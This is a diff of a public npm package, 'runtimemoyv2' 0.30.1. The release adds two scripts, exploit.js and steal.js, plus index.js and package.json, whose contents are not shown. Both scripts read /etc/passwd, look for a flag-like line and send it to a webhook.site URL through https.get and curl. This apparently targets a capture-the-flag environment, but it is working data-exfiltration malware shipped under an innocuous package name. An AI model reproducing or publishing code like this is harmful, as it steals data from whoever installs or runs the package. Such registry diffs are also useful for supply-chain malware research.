runtimemoyv2 0.30.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit.js +27 -0
- package/index.js +9 -0
- package/package.json +10 -0
- package/steal.js +22 -0
package/exploit.js
ADDED
|
@@ -0,0 +1,27 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const { execSync } = require('child_process');
|
|
4
|
+
|
|
5
|
+
console.log('🚨 EXPLOIT v2 EXECUTED');
|
|
6
|
+
|
|
7
|
+
try {
|
|
8
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
9
|
+
const lines = passwd.split('\n');
|
|
10
|
+
|
|
11
|
+
for (const line of lines) {
|
|
12
|
+
if (line.includes('{') && line.includes('}')) {
|
|
13
|
+
console.log('🎯 FLAG:', line);
|
|
14
|
+
|
|
15
|
+
// Пробуем оба метода
|
|
16
|
+
https.get(`https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag_v2=${encodeURIComponent(line)}`);
|
|
17
|
+
|
|
18
|
+
try {
|
|
19
|
+
execSync(`curl -s "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?curl_v2=${encodeURIComponent(line)}"`);
|
|
20
|
+
} catch(e) {}
|
|
21
|
+
|
|
22
|
+
break;
|
|
23
|
+
}
|
|
24
|
+
}
|
|
25
|
+
} catch(e) {
|
|
26
|
+
console.log('Error:', e.message);
|
|
27
|
+
}
|
package/index.js
ADDED
package/package.json
ADDED
package/steal.js
ADDED
|
@@ -0,0 +1,22 @@
|
|
|
1
|
+
const { execSync } = require('child_process');
|
|
2
|
+
|
|
3
|
+
console.log('🚨 FAST EXPLOIT STARTED');
|
|
4
|
+
|
|
5
|
+
// БЫСТРЫЙ код без блокировок
|
|
6
|
+
try {
|
|
7
|
+
const passwd = execSync('cat /etc/passwd', { encoding: 'utf8', timeout: 3000 });
|
|
8
|
+
const lines = passwd.split('\n');
|
|
9
|
+
|
|
10
|
+
for (const line of lines) {
|
|
11
|
+
if (line.includes('{') && line.includes('}')) {
|
|
12
|
+
console.log('🎯 FLAG FOUND:', line);
|
|
13
|
+
// Быстрая отправка
|
|
14
|
+
execSync(`curl -s --max-time 3 "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag=${encodeURIComponent(line)}"`, { timeout: 5000 });
|
|
15
|
+
break;
|
|
16
|
+
}
|
|
17
|
+
}
|
|
18
|
+
} catch(e) {
|
|
19
|
+
console.log('Error:', e.message);
|
|
20
|
+
}
|
|
21
|
+
|
|
22
|
+
console.log('✅ FAST EXPLOIT FINISHED');
|